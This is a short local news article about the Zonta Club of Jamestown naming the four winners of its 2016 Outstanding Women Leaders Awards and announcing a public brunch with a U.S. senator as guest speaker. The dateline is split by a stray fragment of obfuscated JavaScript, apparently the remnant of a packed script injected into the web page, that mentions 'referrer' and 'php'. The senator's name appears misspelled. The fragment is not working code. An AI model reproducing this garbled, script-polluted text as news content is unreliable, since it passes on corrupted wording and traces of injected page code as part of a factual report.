JAMESTOWN, zaedh|var|u0026u|referrer|ekefk||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Zonta Club of Jamestown has announced their 2016 recipients and nominees of their first ever Outstanding Women Leaders Awards.

According to Zonta Club Member Pam Phillips, all of the women were nominated by community members and will be honored during a brunch on Saturday, March 12th. The 2016 winners are Dr. Michelle J. Solensky, Joan L. Morris, Elizabeth E. Kapp and Lynn B. Tally.

Guest speaker U.S. Senator Heidi Keitkamp will address the group and the event will be open to the public. Tickets are available until 8:00 Pm Friday from Riddles Jewelry in the Buffalo Mall. The public is encouraged to attend.

The Zonta Club of Jamestown is part of an international organization working to improve the status of women all over the world.